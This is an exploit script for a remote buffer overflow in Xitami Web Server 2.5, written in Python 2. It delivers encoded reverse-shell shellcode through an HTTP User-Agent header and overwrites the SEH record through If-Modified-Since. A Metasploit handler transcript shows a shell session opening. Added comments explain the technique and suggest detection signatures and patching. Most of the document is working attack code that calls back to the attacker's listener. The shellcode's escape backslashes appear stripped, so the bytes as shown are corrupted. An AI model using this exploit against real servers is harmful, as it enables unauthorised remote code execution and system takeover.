# Exploit Title: Xitami Web Server 2.5 Remote Buffer Overflow (SEH + Egghunter)
# Date: May 4, 2019
# Author: ElSoufiane
# Version: 2.5b4
# Tested on: Windows Vista Ultimate (Build 6000) and Windows XP SP3 Professional
# Discovered by: Krystian Kloskowski
#
# Set up a multi handler listener in MSFConsole
# then run exploit
#
# root@f6c9fa91b403:~/XitamiWebServer# python exploit.py 192.168.1.149
# [+] Sending exploit payload...
#
# Check the MSFConsole listener
#
# msf5 exploit(multi/handler) > run
# [*] Started reverse TCP handler on 0.0.0.0:5801
# [*] Encoded stage with x86/shikata_ga_nai
# [*] Sending encoded stage (267 bytes) to 172.17.0.1
# [*] Command shell session 6 opened (172.17.0.2:5801 -> 172.17.0.1:39416) at 2019-05-04 00:17:55 +0000



# C:\Xitami>

import socket
import sys
import struct

# NOTE(review): Python 2 syntax throughout (print statement, str payloads);
# the script is kept exactly as published, for reference and analysis.
if len(sys.argv) != 2 :
print "[+] Usage : python exploit.py [VICTIM_IP]"
exit(0)

# Target taken from argv; plain HTTP (no TLS) on port 80, so every byte of the
# request built below is visible to any network sensor on the path.
TCP_IP = sys.argv[1]
TCP_PORT = 80


# Egg tag: the 8-byte marker placed directly in front of the shellcode in the
# User-Agent header. The egghunter below embeds the 4-byte half "SOUF" and,
# per its name, scans memory for the tag to locate the shellcode at run time.
egg = "SOUFSOUF"
# Ten 0x90 (x86 NOP) bytes between the tag and the shellcode.
nops = "x90"*10

#msfvenom -p windows/shell/reverse_tcp LPORT=5801 LHOST=192.168.1.129 -f python -v shellcode -e x86/alpha_mixed
# Stage-1 of a windows/shell/reverse_tcp payload (see the msfvenom line above),
# alpha_mixed-encoded: after a short run of non-printable bytes, everything is
# in the printable ASCII range, which is what lets it ride inside an HTTP
# header value. The LHOST/LPORT baked in belong to the author's lab; the
# callback port 5801 matches the handler transcript in the file header.
shellcode = "x89xe0xd9xe5xd9x70xf4x5bx53x59x49x49"
shellcode += "x49x49x49x49x49x49x49x49x43x43x43x43"
shellcode += "x43x43x37x51x5ax6ax41x58x50x30x41x30"
shellcode += "x41x6bx41x41x51x32x41x42x32x42x42x30"
shellcode += "x42x42x41x42x58x50x38x41x42x75x4ax49"
shellcode += "x69x6cx68x68x6cx42x63x30x37x70x63x30"
shellcode += "x51x70x6bx39x6dx35x70x31x6fx30x70x64"
shellcode += "x4ex6bx76x30x70x30x4ex6bx76x32x54x4c"
shellcode += "x6ex6bx72x72x46x74x6cx4bx53x42x55x78"
shellcode += "x34x4fx4ex57x42x6ax35x76x30x31x59x6f"
shellcode += "x4ex4cx77x4cx70x61x31x6cx75x52x34x6c"
shellcode += "x35x70x6bx71x38x4fx56x6dx47x71x4ax67"
shellcode += "x4ax42x49x62x63x62x63x67x6ex6bx63x62"
shellcode += "x52x30x4cx4bx53x7ax77x4cx6ex6bx70x4c"
shellcode += "x72x31x31x68x59x73x30x48x53x31x68x51"
shellcode += "x72x71x4ex6bx30x59x57x50x55x51x6ex33"
shellcode += "x4cx4bx73x79x72x38x48x63x56x5ax62x69"
shellcode += "x4cx4bx66x54x6cx4bx73x31x49x46x64x71"
shellcode += "x4bx4fx6cx6cx5ax61x68x4fx66x6dx77x71"
shellcode += "x69x57x30x38x4bx50x74x35x58x76x55x53"
shellcode += "x71x6dx6bx48x55x6bx73x4dx44x64x32x55"
shellcode += "x4ax44x43x68x4cx4bx70x58x31x34x65x51"
shellcode += "x4ax73x62x46x4ex6bx54x4cx52x6bx6ex6b"
shellcode += "x33x68x37x6cx43x31x4bx63x6ex6bx34x44"
shellcode += "x6cx4bx43x31x4ax70x4cx49x37x34x37x54"
shellcode += "x44x64x51x4bx73x6bx53x51x52x79x52x7a"
shellcode += "x42x71x6bx4fx69x70x71x4fx43x6fx32x7a"
shellcode += "x4cx4bx37x62x7ax4bx4ex6dx71x4dx55x38"
shellcode += "x56x53x70x32x77x70x65x50x62x48x44x37"
shellcode += "x42x53x74x72x63x6fx43x64x33x58x42x6c"
shellcode += "x63x47x31x36x54x47x6dx59x6bx58x69x6f"
shellcode += "x4ex30x4ex58x4cx50x67x71x47x70x67x70"
shellcode += "x37x59x4ax64x31x44x56x30x70x68x55x79"
shellcode += "x4fx70x30x6bx63x30x6bx4fx68x55x61x7a"
shellcode += "x35x5ax72x48x39x50x79x38x45x51x4fx71"
shellcode += "x52x48x46x62x43x30x32x36x39x39x6cx49"
shellcode += "x59x76x36x30x46x30x36x30x32x70x51x50"
shellcode += "x36x30x67x30x76x30x32x48x6ax4ax56x6f"
shellcode += "x79x4fx39x70x59x6fx79x45x5ax37x70x6a"
shellcode += "x46x70x71x46x63x67x30x68x6ex79x69x35"
shellcode += "x44x34x30x61x59x6fx59x45x6dx55x49x50"
shellcode += "x53x44x55x5ax79x6fx30x4ex66x68x53x45"
shellcode += "x6ax4cx6ax48x52x47x73x30x33x30x73x30"
shellcode += "x61x7ax55x50x33x5ax67x74x71x46x66x37"
shellcode += "x62x48x45x52x68x59x4fx38x51x4fx59x6f"
shellcode += "x6bx65x4fx73x7ax58x53x30x63x4ex57x46"
shellcode += "x4cx4bx35x66x32x4ax63x70x72x48x63x30"
shellcode += "x76x70x65x50x77x70x73x66x62x4ax37x70"
shellcode += "x32x48x46x38x4ex44x76x33x79x75x79x6f"
shellcode += "x5ax75x6ex73x76x33x52x4ax73x30x76x36"
shellcode += "x42x73x32x77x33x58x45x52x78x59x78x48"
shellcode += "x61x4fx39x6fx59x45x4dx53x49x68x45x50"
shellcode += "x73x4dx61x38x71x48x62x48x55x50x53x70"
shellcode += "x35x50x53x30x33x5ax45x50x76x30x33x58"
shellcode += "x56x6bx34x6fx46x6fx34x70x4bx4fx78x55"
shellcode += "x71x47x75x38x31x65x70x6ex52x6dx50x61"
shellcode += "x4bx4fx79x45x33x6ex31x4ex4bx4fx44x4c"
shellcode += "x76x44x56x6fx4ex65x72x50x79x6fx69x6f"
shellcode += "x6bx4fx68x69x4dx4bx79x6fx79x6fx49x6f"
shellcode += "x56x61x5ax63x71x39x69x56x51x65x69x51"
shellcode += "x4fx33x6dx6bx5ax50x68x35x4ex42x50x56"
shellcode += "x52x4ax57x70x36x33x69x6fx5ax75x41x41"

# Egghunter stub with the "SOUF" tag spliced into the middle of it; this is
# the small piece of code the SEH jump below lands near.
egghunter ="x66x81xcaxffx0fx42x52x6ax02x58xcdx2ex3cx05x5ax74xefxb8"+"SOUF"+"x89xd7xafx75xeaxafx75xe7xffxe7"

# SEH record overwrite: nseh_jmp fills the next-SEH slot with a 2-byte short
# jump (author's note: back 84 bytes, i.e. into the filler/egghunter region),
# and seh is a 3-byte partial overwrite of the handler pointer with an address
# inside xiwin32.exe (0x00401d87, pop/pop/ret per the author's note), so the
# original top byte of the pointer is reused.
# Defender note: SEH-overwrite exploitation of this shape is generally stopped
# by SafeSEH/SEHOP and DEP, and by ASLR on the module that supplies the handler
# address; whether the affected Xitami build enables any of these is not shown
# here — TODO confirm before relying on it.
nseh_jmp = "xebxaa" #jmp back 84 bytes
seh = "x87x1dx40" # (xiwin32.exe) 0x00401d87 -> pop/pop/ret. ( Partial Overwrite )

# Overflow buffer: 120 bytes of filler, the egghunter, padding so the buffer
# is exactly 190 bytes, then the 2-byte nSEH and 3-byte SEH values, i.e. the
# SEH record is reached at offset 190 of the If-Modified-Since value.
payload = "A"*120
payload += egghunter
payload += "A"*(190-len(payload))
payload += nseh_jmp
payload += seh

# Request layout: the stage (tag + NOP sled + shellcode) travels in User-Agent
# and the SEH overwrite in If-Modified-Since, after a fixed "Wed, " prefix.
# Detection: a single GET / to Xitami whose If-Modified-Since is ~200 bytes of
# mostly "A" (not a date) and whose User-Agent carries the SOUFSOUF tag followed
# by several hundred bytes of alpha-mixed text is a direct signature for this
# PoC; generically, non-date or oversized If-Modified-Since values should be
# rejected at a proxy before the server parses the header.
http_req = "GET / HTTP/1.1 "
http_req += "Host: "+ TCP_IP +" "
http_req += "User-Agent: "+egg+nops+shellcode+" "
http_req += "If-Modified-Since: Wed, " + payload + " "

# One-shot delivery: connect, send the request, close without reading any
# response; the reverse shell (if any) arrives at the handler from the file
# header. Mitigation: the trigger is a single unauthenticated GET, so the only
# real fix is patching or retiring the affected Xitami 2.5 build, with
# header-length limits at a reverse proxy as a stopgap.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((TCP_IP, TCP_PORT))
print "[+] Sending exploit payload..."
s.send(http_req)
s.close()